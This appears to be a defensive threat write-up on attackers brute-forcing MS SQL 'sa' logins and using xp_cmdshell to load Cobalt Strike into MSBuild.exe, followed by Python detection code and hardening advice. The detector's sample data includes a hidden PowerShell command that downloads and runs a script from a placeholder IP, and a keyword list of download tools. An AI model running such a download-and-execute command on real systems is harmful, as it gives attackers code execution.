According to recently released research, threat actors are deploying Cobalt Strike on compromised internet-facing Microsoft SQL (MS SQL) servers as part of a new campaign. MS SQL is a common target because databases tend to hold sensitive data and credentials that an attacker can reuse to pursue further objectives.
Threat actors compromise internet-facing MS SQL servers in one of two main ways: by exploiting an unpatched vulnerability in the MS SQL software, or by brute-forcing the password of the “sa” account, the built-in system administrator login. Once they hold an administrative login, they have been seen using “xp_cmdshell”, an extended stored procedure that is disabled by default but can be re-enabled through sp_configure, to run operating-system commands on the host. In this campaign, cmd.exe and powershell.exe were observed downloading a Cobalt Strike Beacon and injecting it into MSBuild.exe, a legitimate Windows binary. Cobalt Strike then injects its payload into the memory of wwanmm.dll (the WWan Media Manager), a legitimate Windows library, so that the Beacon executes from within a normal-looking module. From there, the Beacon calls out to its Command-and-Control (C2) server and awaits commands from the threat actor.
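The two observable stages of this chain, a burst of failed “sa” logins followed by sqlservr.exe spawning a shell that downloads and launches MSBuild.exe, lend themselves to simple host-side detection. The following Python is an added example, not code from the original research: the ERRORLOG lines and process-creation events it runs over are constructed to resemble real SQL Server error-log entries and Windows 4688/Sysmon process records (the field names `pid`, `ppid`, `image`, `cmdline` are this example's own simplified schema), and the IP addresses and URL are placeholders from documentation ranges.

```python
"""Detect the MS SQL -> xp_cmdshell -> Cobalt Strike chain from host logs.

Added illustration; not part of the original article or research.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# --- Constructed sample data --------------------------------------------------
# ERRORLOG-style lines. Real logs emit an 'Error: 18456' line plus a
# 'Login failed for user' line per attempt; timestamps and clients here are made up.
SAMPLE_ERRORLOG = """\
2022-02-21 10:00:01.12 Logon       Error: 18456, Severity: 14, State: 8.
2022-02-21 10:00:01.12 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2022-02-21 10:00:01.55 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2022-02-21 10:00:02.01 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2022-02-21 10:00:02.48 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2022-02-21 10:00:02.93 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2022-02-21 10:00:03.40 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.10]
2022-02-21 10:00:03.88 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 203.0.113.10]
2022-02-21 10:15:44.07 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.7]
"""

# Process-creation events (simplified 4688/Sysmon fields; all values constructed).
SAMPLE_PROCESS_EVENTS = [
    {"pid": 612, "ppid": 4, "image": r"C:\Windows\System32\services.exe", "cmdline": "services.exe"},
    {"pid": 800, "ppid": 612, "image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE",
     "cmdline": "SQLAGENT.EXE -i MSSQLSERVER"},
    {"pid": 1204, "ppid": 612, "image": r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "cmdline": "sqlservr.exe -sMSSQLSERVER"},
    # xp_cmdshell pattern: sqlservr.exe spawns cmd.exe, which runs a PowerShell downloader.
    {"pid": 3310, "ppid": 1204, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/payload.txt\')"'},
    {"pid": 3322, "ppid": 3310, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/payload.txt\')"'},
    {"pid": 3340, "ppid": 3322, "image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", "cmdline": "MSBuild.exe"},
    # Benign noise: a maintenance job launched by SQL Agent, not by sqlservr.exe.
    {"pid": 4100, "ppid": 800, "image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd.exe /c robocopy D:\backups \\nas\sql"},
]

# --- Stage 1: brute force against 'sa' -----------------------------------------
FAILED_LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login failed for user '(?P<user>[^']+)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(errorlog: str, user: str = "sa"):
    """Return [(timestamp, client_ip)] for every failed login of `user` in ERRORLOG text."""
    hits = []
    for line in errorlog.splitlines():
        m = FAILED_LOGIN_RE.match(line)
        if m and m.group("user") == user:
            hits.append((datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f"), m.group("client")))
    return hits


def detect_sa_bruteforce(errorlog: str, threshold: int = 5, window: timedelta = timedelta(seconds=60)):
    """Map client IP -> peak number of failed 'sa' logins seen inside any sliding `window`,
    for clients that reached `threshold`. A single failure per hour is not flagged."""
    by_client = defaultdict(list)
    for ts, client in parse_failed_logins(errorlog):
        by_client[client].append(ts)
    flagged = {}
    for client, times in by_client.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[client] = max(flagged.get(client, 0), end - start + 1)
    return flagged


# --- Stage 2: xp_cmdshell child processes and the MSBuild.exe loader -----------
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "certutil", "bitsadmin", "http://", "https://")


def _name(image: str) -> str:
    return PureWindowsPath(image).name.lower()


def detect_xp_cmdshell_chain(events):
    """Find shells whose parent is sqlservr.exe (how xp_cmdshell output appears in process logs)
    and, across each shell's descendants, download cues and MSBuild.exe launches."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)

    def descendants(pid):
        stack = list(children[pid])
        while stack:
            e = stack.pop()
            yield e
            stack.extend(children[e["pid"]])

    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent and _name(parent["image"]) == "sqlservr.exe" and _name(e["image"]) in SHELLS:
            tree = [e, *descendants(e["pid"])]
            f = {
                "shell_pid": e["pid"],
                "download_cue": any(m in d["cmdline"].lower() for d in tree for m in DOWNLOAD_MARKERS),
                "msbuild_pids": sorted(d["pid"] for d in tree if _name(d["image"]) == "msbuild.exe"),
            }
            f["severity"] = "high" if f["download_cue"] or f["msbuild_pids"] else "medium"
            findings.append(f)
    return findings


if __name__ == "__main__":
    print("sa brute force:", detect_sa_bruteforce(SAMPLE_ERRORLOG))
    print("xp_cmdshell chains:", detect_xp_cmdshell_chain(SAMPLE_PROCESS_EVENTS))
```

Any shell spawned directly by sqlservr.exe is worth an alert on its own, because legitimate database workloads rarely need one; the download markers and the MSBuild.exe descendant only raise the severity. The SQL Agent job in the sample is deliberately left unflagged to show that the parent check, not the mere presence of cmd.exe, carries the signal.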
Although no post-exploitation activity was recorded, the threat actors likely use this initial compromise as a foothold in the victim's network, from which they can move laterally to additional sensitive systems. For defenders, the chain points to a few checks: do not expose MS SQL (TCP 1433 by default) directly to the internet, set a strong password for “sa” or disable the login outright, keep xp_cmdshell disabled and audit any attempt to enable it, and alert on sqlservr.exe spawning cmd.exe or powershell.exe.